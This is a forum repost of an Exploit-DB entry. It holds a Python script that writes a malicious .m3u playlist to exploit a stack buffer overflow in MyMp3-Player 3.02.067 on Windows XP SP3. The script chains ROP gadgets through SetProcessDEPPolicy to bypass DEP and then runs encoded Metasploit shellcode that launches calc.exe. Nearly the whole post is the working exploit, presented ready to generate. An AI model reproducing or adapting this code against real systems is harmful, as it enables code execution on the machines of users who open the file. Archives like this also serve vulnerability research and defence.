Wubi Posted July 24, 2012 Report Posted July 24, 2012 MyMp3 Player Stack .m3u DEP Bypass Exploit[table=width: 500, class: grid][tr] [td]EDB-ID: 20053[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td][/tr][tr] [td]Author: Daniel Romero[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td][/tr][tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td][/tr][/table]'''Title: MyMp3-Player '.m3u' Stack BOF (Bypass DEP)Author: Daniel Romero Perez (@daniel_rome)Software & Version: MyMp3-Player 3.02.067Tested on: Windows XP SP3 - ESMail: unlearnsecurity@gmail.comBlog: unlearningsecurity.blogspot.comAdvisor: http://www.securityfocus.com/bid/38835/infoArticle: http://unlearningsecurity.blogspot.com.es/2012/07/bypass-dep-no-permanente-con.html'''import osimport struct# BufferBuff = "\x41" * 1024# ShellCode (ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b '\x0a\x0d\x20\x00' -t c) - 227 bytesShellCode = ("\xb8\xf8\x16\x8a\x64\xd9\xe9\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x33\x31\x46\x12\x83\xc6\x04\x03\xbe\x18\x68\x91\xc2\xcd\xe5" "\x5a\x3a\x0e\x96\xd3\xdf\x3f\x84\x80\x94\x12\x18\xc2\xf8\x9e" "\xd3\x86\xe8\x15\x91\x0e\x1f\x9d\x1c\x69\x2e\x1e\x91\xb5\xfc" "\xdc\xb3\x49\xfe\x30\x14\x73\x31\x45\x55\xb4\x2f\xa6\x07\x6d" "\x24\x15\xb8\x1a\x78\xa6\xb9\xcc\xf7\x96\xc1\x69\xc7\x63\x78" "\x73\x17\xdb\xf7\x3b\x8f\x57\x5f\x9c\xae\xb4\x83\xe0\xf9\xb1" "\x70\x92\xf8\x13\x49\x5b\xcb\x5b\x06\x62\xe4\x51\x56\xa2\xc2" "\x89\x2d\xd8\x31\x37\x36\x1b\x48\xe3\xb3\xbe\xea\x60\x63\x1b" "\x0b\xa4\xf2\xe8\x07\x01\x70\xb6\x0b\x94\x55\xcc\x37\x1d\x58" "\x03\xbe\x65\x7f\x87\x9b\x3e\x1e\x9e\x41\x90\x1f\xc0\x2d\x4d" "\xba\x8a\xdf\x9a\xbc\xd0\xb5\x5d\x4c\x6f\xf0\x5e\x4e\x70\x52" "\x37\x7f\xfb\x3d\x40\x80\x2e\x7a\xbe\xca\x73\x2a\x57\x93\xe1" "\x6f\x3a\x24\xdc\xb3\x43\xa7\xd5\x4b\xb0\xb7\x9f\x4e\xfc\x7f" "\x73\x22\x6d\xea\x73\x91\x8e\x3f\x10\x74\x1d\xa3\xf9\x13\xa5" "\x46\x06")Nops = "\x90" * 50##ROP --> Bypass DEP with SetProcessDEPPolicyROP = struct.pack('<L',0x77f4c25f) # POP EBX / RETROP += struct.pack('<L',0x41414141) # JUNKROP += struct.pack('<L',0xFFFFFFFF) # PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFFROP += struct.pack('<L',0x7e810b7e) # INC EBX / RETROP += struct.pack('<L',0x77f445bf) # POP EBP / RETROP += struct.pack('<L',0x7C862144) # <- SetProcessDEPPolicyROP += struct.pack('<L',0x77f45493) # POP EDI / RETROP += struct.pack('<L',0x77f4108c) # RETROP += struct.pack('<L',0x77f4567e) # POP ESI / RETROP += struct.pack('<L',0x77f4108c) # RETROP += struct.pack('<L',0x58c35ff7) # PUSHAD / RET# Exploitexploit = Buff + ROP + Nops + ShellCode# Create Filefile = open("exploit_mymp3-player_BOF.m3u", "wb")file.write(exploit)file.close()print ("Your file has been generated successfully!!") Quote